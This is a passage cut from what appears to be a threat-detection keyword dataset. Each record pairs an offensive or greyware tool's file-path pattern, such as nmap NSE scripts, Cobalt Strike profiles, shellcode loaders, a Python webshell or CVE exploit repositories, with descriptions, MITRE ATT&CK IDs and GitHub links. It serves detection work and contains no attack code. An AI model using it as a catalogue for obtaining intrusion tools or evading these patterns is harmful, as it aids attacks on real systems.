and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/IPayloadService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/ip-forwarding.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/IPfuscation.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/IPfuscation.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/ip-geolocation-geoplugin.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-ipinfodb.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-map-bing.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-map-google.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-map-kml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-maxmind.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-https-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipidseq.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipmi_passwords.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ipmi-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipmi-cipher-zero.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipmi-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipscan.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,1,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/ipscan_*_amd64.deb*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/ipscan2-binary/*.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/ipscan-any-*.jar*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/ipv6-multicast-mld-list.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipv6-node-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipv6-ra-flood.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-botnet-channels.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-sasl-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-unrealircd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irs.exe*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,1,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*/iscsi-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/iscsi-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/isns-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ItWasAllADream.git*,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,1,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*/Ivy/Cryptor*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,1,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*/Ivy/Loader/*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,1,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*/jackit*,offensive_tool_keyword,jackit,Wireless Mouse and Keyboard Vulnerability This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. 
Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants,T1210 - T1212 - T1560 - T1562,TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/insecurityofthings/jackit,1,0,N/A,N/A,8,756,138,2020-10-01T04:37:00Z,2016-07-01T23:21:56Z -*/jaff.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/jas502n/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*/jasperloader.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/java/jndi/RMIRefServer.java*,offensive_tool_keyword,POC,JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.,T1190 - T1133 - T1595 - T1132 - T1046 - T1041,TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/welk1n/JNDI-Injection-Exploit,1,1,N/A,N/A,10,2331,715,2023-03-22T21:23:32Z,2019-10-10T01:53:49Z -*/jdwp-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/jdwp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/jdwp-inject.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/jdwp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/jiansiting/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jiansiting/CVE-2020-5902,1,0,N/A,N/A,1,6,5,2020-07-07T02:03:40Z,2020-07-07T02:03:39Z -*/Jira-Lens.git*,offensive_tool_keyword,Jira-Lens,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,1,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*/Jira-Lens/*,offensive_tool_keyword,RedTeam_toolkit,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,1,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*/JoelGMSec/PyShell*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/john -*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/john.git*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*/john/run/*.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/john/run/*.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/JohnTheRipper*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/Jormungandr.git*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation 
tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*/js/stage.js*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/js_inject.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/juicypotato*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/JuicyPotatoNG.git*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*/Jump-exec/Psexec*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/K8_CS_*_*.rar*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*/k8gege/*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
